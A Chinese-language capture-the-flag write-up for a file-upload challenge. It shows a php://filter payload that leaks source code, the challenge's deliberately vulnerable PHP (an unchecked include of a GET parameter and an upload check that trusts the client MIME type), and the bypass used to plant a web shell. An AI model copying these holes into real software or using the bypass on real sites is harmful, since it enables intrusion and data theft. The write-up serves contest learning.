第三届“百越杯”福建省高校网络空间安全大赛_Do you know upload?_WriteUp
打开网站
题目类型:文件上传
注释中提示存在文件包含漏洞,怀疑是不是审计上传代码,并利用上传漏洞上传shell脚本
上传测试
上传php失败
利用php://filter伪协议获得index.php代码
?file=php://filter/convert.base64-encode/resource=index.php
代码审计
<?php
include($_GET['file']);
@$pic = $_FILES["file"]["name"];
@$pics = explode('.' , $pic);
if(@isset($_POST[submit])){ //限制MIME
if ((($_FILES["file"]["type"] == "image/gif")
|| ($_FILES["file"]["type"] == "image/jpeg")
|| ($_FILES["file"]["type"] == "image/pjpeg"))){
if ($_FILES["file"]["error"] > 0){
echo "Return Code: " . $_FILES["file"]["error"] . "
";
}else{
echo "Upload: " . $_FILES["file"]["name"] . "
";
echo "Type: " . $_FILES["file"]["type"] . "
";
echo "Size: " . ($_FILES["file"]["size"] / 1024) . " Kb
";
//echo "Temp file: " . $_FILES["file"]["tmp_name"] . "
";
if (file_exists("upload/" . $_FILES["file"]["name"])){
echo $_FILES["file"]["name"] . " already exists. ";
}else{
move_uploaded_file($_FILES["file"]["tmp_name"],
"upload/" . $_FILES["file"]["name"]);
echo "Stored in: " . "upload/" . $_FILES["file"]["name"];
}
}
}else{
echo "";
echo "Invalid file";
}
}else{
// echo "Invalid file";
}
?>
修改MIME成功上传
成功使用蚁剑连接
找到数据库配置文件
连接数据库获得flag
palylaod
修改MIME
Content-Type: image/jpeg